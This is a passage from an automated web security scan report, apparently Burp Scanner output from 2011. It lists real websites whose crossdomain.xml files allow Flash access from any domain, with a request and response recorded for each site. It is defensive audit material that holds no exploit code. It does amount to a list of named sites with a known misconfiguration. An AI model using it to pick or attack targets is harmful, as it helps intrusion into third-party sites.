<cross-domain-policy>
   <allow-access-from domain="*" secure="false"/>
   <allow-access-from domain="*" to-ports="80,443"/>
   <allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-
...[SNIP]...

7.135. http://www.splashup.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.splashup.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.splashup.com

Response

HTTP/1.1 200 OK
Content-Length: 274
Content-Type: text/xml
Last-Modified: Thu, 18 Oct 2007 00:50:20 GMT
Accept-Ranges: bytes
ETag: "0ee8adb2011c81:37ff"
Server: Microsoft-IIS/6.0
Date: Tue, 03 May 2011 10:08:46 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />

...[SNIP]...
<allow-access-from domain="*" secure="true" />
...[SNIP]...

7.136. http://www.thecampuscommon.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.thecampuscommon.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.thecampuscommon.com

Response

HTTP/1.1 200 OK
Content-Length: 409
Content-Type: text/xml
Last-Modified: Wed, 30 Dec 2009 04:25:38 GMT
Accept-Ranges: bytes
ETag: "04d6423889ca1:301"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:54:56 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!--Generic policy file for flex app access, it should be made more restricti
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.137. http://www.theevonywiki.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.theevonywiki.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.theevonywiki.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 21 Dec 2010 17:34:25 GMT
Content-Length: 327
Date: Tue, 03 May 2011 11:41:54 GMT
Connection: close
X-Cache-Hits: -1
X-Backend: phpservers2
X-Req: 2000108200
X-Language: en
X-URL: /crossdomain.xml

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-polici
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.138. http://www.themag12.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.themag12.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.themag12.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:33:20 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.12-2 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8k mod_wsgi/2.5 Python/2.5.2
Last-Modified: Fri, 30 Apr 2010 15:25:22 GMT
ETag: "38a047-13f-48575da00dc80"
Accept-Ranges: bytes
Content-Length: 319
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.139. http://www.themat.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.themat.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.themat.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/xml
Date: Tue, 03 May 2011 10:28:17 GMT
Accept-Ranges: bytes
Connection: close
Set-Cookie: X-Mapping-hmaddpem=451B32BFF54A8789442A5D320937FD91; path=/
Last-Modified: Fri, 28 Jan 2011 07:35:15 GMT
Content-Length: 196

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />

</cross-domain-policy>

7.140. http://www.thomann.de/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.thomann.de
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.thomann.de

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:35:55 GMT
Server: Apache/2.2.17
Last-Modified: Mon, 01 Sep 2008 16:23:25 GMT
ETag: "ca-455d805c5f940"
Accept-Ranges: bytes
Content-Length: 202
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

7.141. http://www.ticketleap.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ticketleap.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ticketleap.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 25 Jan 2011 18:44:12 GMT
Accept-Ranges: bytes
ETag: "21fdbdbbfbccb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: .ticketleap.net=AtPjbY5TfUStJbetomP_Z_RwqHCOhhCGuCICxzr6rQgAAvZdcyqGZLeYDnW7MeLdQW6Tnd7lTIFefG3VvevnCWXQBj5byCNMyzb-9Ifl9HSDu-cnVRCDDlZn96TwE0MPcG_MXGb-0ULuysitDJaPWvvn-0w1; domain=.ticketleap.net; expires=Tue, 03-May-2011 11:26:27 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
TL-Server: 2
Date: Tue, 03 May 2011 10:56:27 GMT
Connection: close
Content-Length: 153

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.142. http://www.towsontigers.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.towsontigers.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.towsontigers.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:37:35 GMT
Server: Apache
Last-Modified: Mon, 09 Mar 2009 13:39:57 GMT
ETag: "5e-464afc52da540"
Accept-Ranges: bytes
Content-Length: 94
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

7.143. http://www.traxnyc.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.traxnyc.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.traxnyc.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:36:51 GMT
Server: Apache
Last-Modified: Wed, 25 Aug 2010 07:36:56 GMT
ETag: "254c01a-105-48ea0f2303600"
Accept-Ranges: bytes
Content-Length: 261
Cache-Control: max-age=29030400, private, must-revalidate
Expires: Tue, 03 Apr 2012 10:36:51 GMT
Connection: close
Content-Type: application/xml

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*"/>
<allow-access-from domain="*.*"/>
...[SNIP]...

7.144. http://www.truthin2010.org/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.truthin2010.org
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.truthin2010.org

Response

HTTP/1.1 200 OK
Content-Length: 227
Content-Type: text/xml
Last-Modified: Fri, 08 Jan 2010 21:55:23 GMT
Accept-Ranges: bytes
ETag: "435b6647ad90ca1:369"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:24:47 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

...[SNIP]...

7.145. http://www.tubeguide.info/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.tubeguide.info
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tubeguide.info

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:26:56 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.6
Last-Modified: Fri, 28 Nov 2008 00:03:16 GMT
ETag: "ef0a5f-65-9684d900"
Accept-Ranges: bytes
Content-Length: 101
Cache-Control: max-age=-76501420
Expires: Sat, 29 Nov 2008 00:03:16 GMT
Vary: User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.146. http://www.tunecore.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.tunecore.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tunecore.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:22:51 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.8e-fips-rhel5 DAV/2 Phusion_Passenger/2.2.9
Last-Modified: Fri, 22 Jan 2010 19:11:46 GMT
ETag: "16e08ef-91-47dc597398080"
Accept-Ranges: bytes
Content-Length: 145
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.147. http://www.tvb.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.tvb.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tvb.com

Response

HTTP/1.0 200 OK
Server: Apache/2
Last-Modified: Tue, 29 Sep 2009 07:26:24 GMT
ETag: "1040f6-cd-474b254e2e800"
Accept-Ranges: bytes
Content-Length: 205
Content-Type: application/xml
Expires: Tue, 03 May 2011 10:15:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 10:15:48 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

7.148. http://www.twilightersanonymous.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.twilightersanonymous.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.twilightersanonymous.com

Response

HTTP/1.1 200 OK
Server: cloudflare-nginx
Date: Tue, 03 May 2011 10:30:04 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Wed, 25 Aug 2010 06:25:54 GMT
ETag: "cb-48e9ff4274080"
Cache-Control: public, must-revalidate, proxy-revalidate
Expires: Tue, 03 May 2011 11:30:04 GMT
Vary: Accept-Encoding,User-Agent
Pragma: public
X-Powered-By: W3 Total Cache/0.9.1.3
Set-Cookie: __cfduid=d0524ef7d8e09e02942c841bad2c4b4971304418604; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.twilightersanonymous.com
Set-Cookie: __cfduid=d0524ef7d8e09e02942c841bad2c4b4971304418604; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.www.twilightersanonymous.com

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

7.149. http://www.verawang.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.verawang.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.verawang.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:10:31 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 13 Oct 2010 15:50:01 GMT
ETag: "18d1b2d-66-492818bd0dc40"
Accept-Ranges: bytes
Content-Length: 102
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.150. http://www.vertadnet.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vertadnet.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.vertadnet.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:10:38 GMT
Server: Apache/2.2.15 (Red Hat)
Last-Modified: Tue, 15 Dec 2009 16:35:14 GMT
ETag: "14000f-c8-47ac6f972b480"
Accept-Ranges: bytes
Content-Length: 200
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.151. http://www.vladtod.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vladtod.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.vladtod.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:44:30 GMT
Server: Apache/1.3.27 (Unix) PHP/4.4.6
Last-Modified: Thu, 07 Apr 2011 20:28:04 GMT
ETag: "8f52b-c9-4d9e1e54"
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

7.152. http://www.wdasfm.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wdasfm.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wdasfm.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 03 Mar 2010 20:22:57 GMT
Content-Type: application/xml
Content-Length: 350
X-Varnish: 3146047657
X-Cache-Server: varnish04
Expires: Tue, 03 May 2011 10:29:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 10:29:14 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.153. http://www.we7.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.we7.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.we7.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml;charset=ISO-8859-1
Content-Length: 163
Date: Tue, 03 May 2011 11:18:50 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" secure="false" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
</cross-domain-policy>

7.154. http://www.wect.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wect.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wect.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS37
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/xml
Last-Modified: Thu, 06 Nov 2008 15:03:45 GMT
ETag: "1f1e5ddd2040c91:9aa"
Cteonnt-Length: 208
Expires: Tue, 03 May 2011 10:16:16 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 03 May 2011 10:16:16 GMT
Content-Length: 208
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

7.155. http://www.weebls-stuff.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.weebls-stuff.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.weebls-stuff.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:19:08 GMT
Server: Apache/1.3.37 (Unix) mod_gzip/1.3.26.1a PHP/5.2.3 with Suhosin-Patch
Last-Modified: Wed, 30 Jan 2008 14:28:47 GMT
ETag: "552c10-cb-47a0899f"
Accept-Ranges: bytes
Content-Length: 203
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

7.156. http://www.wildfanny.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wildfanny.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wildfanny.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 194
Date: Tue, 03 May 2011 10:20:27 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

7.157. http://www.wowtattoos.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wowtattoos.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wowtattoos.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:19:18 GMT
Server: Apache
Last-Modified: Mon, 13 Apr 2009 05:45:07 GMT
ETag: "e1"
Accept-Ranges: bytes
Content-Length: 225
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

...[SNIP]...

7.158. http://www.wten.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wten.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wten.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS31
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/xml
Last-Modified: Thu, 06 Nov 2008 15:03:45 GMT
ETag: "1f1e5ddd2040c91:a0e"
Cteonnt-Length: 208
Expires: Tue, 03 May 2011 10:30:15 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 03 May 2011 10:30:15 GMT
Content-Length: 208
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

7.159. http://www.yardbarker.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yardbarker.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.yardbarker.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.35
Date: Tue, 03 May 2011 17:08:26 GMT
Content-Type: text/xml
Content-Length: 199
Last-Modified: Thu, 16 Jul 2009 00:25:33 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.160. http://www.yournewenglandforddealer.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yournewenglandforddealer.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.yournewenglandforddealer.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 10 Jun 2010 20:56:18 GMT
Accept-Ranges: bytes
ETag: "05505fdf8cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:44:11 GMT
Connection: close
Content-Length: 240

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" to-ports="80,443" />
...[SNIP]...

7.161. http://ads.adbrite.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.adbrite.com

Response

HTTP/1.0 200 OK
Accept-Ranges: none
Content-Type: text/x-cross-domain-policy
Date: Tue, 03 May 2011 15:41:39 GMT
Server: XPEHb/1.0
Content-Length: 398
Connection: close

<?xml version="1.0" encoding="UTF-8"?>

<cross-domain-policy>
<allow-access-from domain="*.adbrite.com" secure="true" />
<allow-access-from domain="www.adbrite.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.britepic.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.britepic.com" secure="true" />
...[SNIP]...

7.162. http://cookex.amp.yahoo.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://cookex.amp.yahoo.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cookex.amp.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:40:26 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 14 May 2010 21:53:13 GMT
Accept-Ranges: bytes
Content-Length: 1548
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
...[SNIP]...
<allow-access-from domain="*.sueddeutsche.de" />
<allow-access-from domain="*.ooyala.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.fwmrm.net" />
<allow-access-from domain="*.auditude.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.mavenapps.net" />
<allow-access-from domain="*.maventechnologies.com" />
<allow-access-from domain="*.grindtv.com" />
<allow-access-from domain="*.vipix.com" />
<allow-access-from domain="*.maven.net" />
<allow-access-from domain="*.mlb.com" />
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.comcast.net" />
<allow-access-from domain="*.comcastonline.com" />
<allow-access-from domain="*.flickr.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.overture.com" />
<allow-access-from domain="*.rivals.com" />
<allow-access-from domain="*.scrippsnewspapers.com" />
<allow-access-from domain="*.vmixcore.com" />
<allow-access-from domain="*.vmix.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.yimg.com" />
...[SNIP]...

7.163. http://feeds.bbci.co.uk/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://feeds.bbci.co.uk
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Server: Apache
Content-Type: text/xml
Cache-Control: max-age=113
Expires: Tue, 03 May 2011 16:11:03 GMT
Date: Tue, 03 May 2011 16:09:10 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

7.164. http://newsrss.bbc.co.uk/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://newsrss.bbc.co.uk
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=117
Expires: Tue, 03 May 2011 16:11:06 GMT
Date: Tue, 03 May 2011 16:09:09 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

7.165. http://open.ad.yieldmanager.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://open.ad.yieldmanager.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: open.ad.yieldmanager.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:40:25 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 27 Jul 2010 20:57:57 GMT
Accept-Ranges: bytes
Content-Length: 1548
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
...[SNIP]...
<allow-access-from domain="*.sueddeutsche.de" />
<allow-access-from domain="*.ooyala.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.fwmrm.net" />
<allow-access-from domain="*.auditude.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.mavenapps.net" />
<allow-access-from domain="*.maventechnologies.com" />
